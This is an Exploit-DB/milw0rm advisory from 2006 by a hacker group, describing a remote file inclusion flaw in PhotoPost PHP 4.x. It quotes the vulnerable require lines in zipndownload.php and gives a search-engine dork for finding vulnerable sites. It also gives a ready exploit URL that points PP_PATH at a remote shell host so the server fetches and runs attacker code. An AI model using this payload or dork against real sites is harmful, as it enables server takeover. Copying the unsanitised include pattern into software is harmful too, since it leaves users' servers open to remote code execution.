PhotoPost 4.6 - 'PP_PATH' Remote File Inclusion

EDB-ID:

2369


Platform:

PHP

Published:

2006-09-15

#====================================================================
#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.popphoto.com/
#
#=================================================================
#
#Script Name: PhotoPost 4.6 & 4.5 & 4.x.....4.0
#Fix : update To 4.7 or 4.8
#Script :)
#http://www.9q9q.net/up3/index.php?f=UyTfHCHIg
#
#=================================================================
#Bug in : zipndownload.php
#        require "$PP_PATH/languages/$pplang/showgallery.php";
#        require "$PP_PATH/login-inc.php";
#
#in <<<<  zipndownload.php & .... :)
#Dork :in Yahoo ---: "Powered by: PhotoPost PHP 4.6" or "Powered by: PhotoPost PHP 4.5"
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://site.com/[path]/zipndownload.php?PP_PATH=http://SHELLURL.COM?
#
#=================================I LOVE SAUDI
ARABIA=============================================
#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ :SnIpEr_Sa , King18 , LeCoPrA And All My Frind
#www.S3hr.com , http://www.elite-team.cc/vb , www.3asfh.net  ,www.xp10.com ,www.lezr.com
==================================I LOVE SAUDI ARABIA=============================================#

# milw0rm.com [2006-09-15]